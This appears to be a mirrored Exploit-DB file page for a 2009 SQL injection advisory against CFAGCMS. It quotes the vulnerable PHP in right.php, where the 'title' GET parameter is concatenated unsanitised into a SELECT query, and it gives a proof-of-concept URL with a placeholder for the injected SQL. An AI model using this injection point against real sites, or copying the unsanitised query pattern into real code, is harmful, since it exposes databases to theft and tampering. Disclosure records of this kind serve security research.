exploit-db-mirror/exploits/php/webapps/10561.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
831 B
Text

################################################################################
## Exploit Title: CFAGCMS SQL Injection Exploit ##
## Date: 20-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://sourceforge.net/project/showfiles.php?group_id=197936##
## Version: N/A ##
## Tested on: GNU/LINUX ##
################################################################################
~ Code [right.php]
$title = $_GET['title'];
$query = "SELECT * FROM pages WHERE title = '".$title."'";
$result = mysql_query($query);
~ PoC
[cfagcms_path]/right.php?title=[SQL]